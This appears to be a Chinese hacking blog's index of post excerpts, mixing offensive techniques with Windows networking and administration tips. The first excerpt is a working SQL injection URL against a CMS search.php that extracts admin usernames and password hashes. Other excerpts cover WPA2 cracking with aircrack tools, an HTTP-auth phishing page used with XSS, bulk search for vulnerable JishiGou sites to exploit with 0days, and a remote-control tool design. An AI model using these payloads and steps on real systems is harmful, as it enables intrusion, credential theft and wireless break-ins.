摘要：首先：注入exp有时候 有些/plus/目录换成了/plugins目录/plugins/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a/plus/search.php?keyword=as&type 阅读全文

摘要：usb无线网卡在实机中可以识别 ，虚拟机版本vm8.0+win7。但在虚拟机xp,bt5,cdlinux等也都可以识别usb无线网卡，但一直提示设备正在运行中。尝试过的方法总汇： 1.重装vm，无果 2.换vm版本7.0,无果 3.驱动重装，无果 4.gpedit.msc-》计算机配置-》管理模块-》系统-》设备安装-》设置安装限制-》”阻止使用于下列设备安装程序相匹配的驱动程序安装设备“-》显示里加入usb无线网卡的guid，无果 5."It looks like USB3.0 is not supported yet".usb3.0的原因，换usb接口，用usb2.0， 阅读全文

摘要：WPA 2 密碼破解Ifconfig –a 查看所有網卡Ifconfig wlan0 up 激活無線網卡Airmon-ng start wlan0 設置無線網卡模式 mon0,mon1,mon2……Airmon-ng stop mon0 6Airodump-ng mon0 查看無線網絡信息 ---注意要看到ch，知道在哪個通道Airodump-ng –w belie8 –c 6 --bssid AP’sMAC mon0 開始監聽，信息保存在belie8.cap. –c參數就是上面所說的通道選擇airodump-ng -w beli8 -c 6 mon0 抓包信息 參數與上一致airepl... 阅读全文

摘要：近日xss火爆，有用php http认证方式进行钓鱼的。官方例子：<?phpif(!isset($_SERVER['PHP_AUTH_USER'])){header('WWW-Authenticate:Basicrealm="MyRealm"');header('HTTP/1.0401Unauthorized');echo'TexttosendifuserhitsCancelbutton';exit;}else{echo"<p>Hello{$_SERVER['PHP_AUTH 阅读全文

摘要：有时候多人出门都要上网，又遇到网线接口不够用，又没有无线的情况。可以试试开启win7系统下的无线网络，脚本代码：@echo offgoto menu:menuecho---------------------------------------------------------------echo**************************1.打开无线 **************************echo**************************2.关闭无线 **************************echo************************ 阅读全文

摘要：#创建无线连接netsh wlan set hostednetwork mode=allow ssid=无线名 key=密码#开启无线网netsh wlan start hostednetwork#在网络连接中共享本地连接将网络共享给刚创建的那无线网络就行　Netsh WLAN show hostednetwork: 显示无线托管网络的设置，包括所连接的用户列表 Netsh WLAN refresh hostednetwork: 为虚拟无线网络设置一个新的WPA2-PSK密钥。 你只需输入这个命令，并且可以使用你自己喜欢的密钥。 Netsh WLAN stop hostednetwork: 禁 阅读全文

摘要：最小的权限A. NTFS系统权限设置 在使用之前将每个硬盘根加上 Administrators 用户为全部权限(可选加入SYSTEM用户)删除其它用户.B. 进入系统盘:权限如下C:\WINDOWS Administrators SYSTEM用户全部权限 Users 用户默认权限不作修改.其它目录删除Everyone用户，注意以下文件夹保留Everyone用户,C:\Documents and Settings下All Users\Default User目录及其子目录如C:\Documents and Settings\All Users\Application Data 目录默认配置保留了 阅读全文

摘要：很早的东西，最先发的地方http://blog.sina.com.cn/s/blog_65127e430100qn0q.html;突然又用到，再转回过来实习期间，因老师对学生常常退出客户端，使得老师无法对学生进行管理，就写了个程序，下面是部分代码，总体的思路是，判断学生端进程是否存在，如果不存在，对其主机进行关机操作。其实我还加了另一部分，把原来的学生端的进程改成了smms.exe，使得部分学生不知道哪个是客户端，其实大部分利用的还是木马捆绑的原理。#include "stdafx.h"#include "Tlhelp32.h"#include < 阅读全文

摘要：原理很简单，以后看着0day的时候都试着批量下吧，省事。。。。<?php $keyword='Powered by JishiGou' ; // 批量关键字$timeout = 40;$stratpage =1; //启始页$lastpage = 10000;//终止页for ($i=$stratpage ; $i<=$lastpage ; $i++ ){$array=ReadBaiduList($keyword,$timeout,$i);//百度搜索到的url保存到array数据foreach ($array as $key=>$url ){//对数据遍历， 阅读全文

摘要：先上图未连接连接后学着黑防的远控写着，慢慢改成自己所想要的形式。记录下远近软件设计思路： 传输命令结构typedef struct {int ID; //表示执行命令 可用#define ... 0x..定义BYTE lparam[2048];}COMMAND;列举几个功能的实现思路： 1.执行文件步骤： 客户端：传送COMMAND结构，ID为定义的可执行id,lparam参数表示文件在目标机器上的绝对路径 服务端：监听并接收处理到ID为执行文件标志时，跳到相应的执行函数，取出lparam参数表示的绝对路径，得取进程的执行权限执行函数。 2.远程关机、注销、重启 客户端：发送COMM... 阅读全文

摘要：无意中翻了翻旧日的代码，原来在上一次交易签名无效的问题仅仅是出现在一个调用的问题上，merchantProperties.php被调用了两次，当第一次被调用的时候是正确加载的，而在第二次调用的时候出就会出现参数丢失的现象，正因为这样加上session或其它全局方式则不会出现此问题，而不是编码问题。 yeepayCommon.php <?phpinclude 'merchantProperties.php';/** @Description 易宝支付产品通用接口范例 * @V3.0* @Author rui.xin*/#产品通用接口正式请求地址$reqURL_onLine 阅读全文

摘要：2.1 Google Hack技术大演练allintext:关键字，与intitle功能相同intext:验证码 4800cache:关键字 ：搜索含有关键字内容cache。比如搜索北京大学网站服务器中缓存的内容，cache:pku.edu.cndefine:关键字：搜索关键字的定义filetype:文件名.后缀名。搜索特定的文件。info:关键字。搜索含有关键字的URL地址。link:关键字。查找与关键字做了链接的URL地址site:域名。返回域名中所有的URL地址，它可以探测网站的拓扑结构进行，也是非常的重要related:URL 。搜索与指定URL相关的页面。stocks:搜索有关一家公 阅读全文

摘要：用到的抓包工具：WPE（专门的抓包工具，可实现独立的封包发送，常用制作外挂）要得到的信号服务器的方式： 1.要么得到服务器程序，直接抓包分析即可得到信号服务器，除了你入侵此服务器，否则不现实。 2.从客户端得到的分散的信号，如果信号是加密的，那么就可以通过数据进行相同比较与不同的比较，还有注重拆解数据的解构封包组成 1.需要的传输数据（主要修改的就是这部分，也是最重要的部分 2.序列号（每个封包必须有自己序列号，主要在于数据的重组。了解过TCP/IP的结构的都应该明白的） 3.ip地址等，有点费话了，这些本身就包含在ip结构里的，当对于我们来说，有这几部分就足够了。 阅读全文

摘要：netstat -an -b -o //获取进程名称 端口 pidwmic process list brief >> d:\process.txt //获取进程摘要信息结束一个进程(可根据进程对应的PID)wmic process where name="notepad.exe" deletewmic process where name="notepad.exe" terminatewmic process where pid="123" deletewmic path win32_process where &quo 阅读全文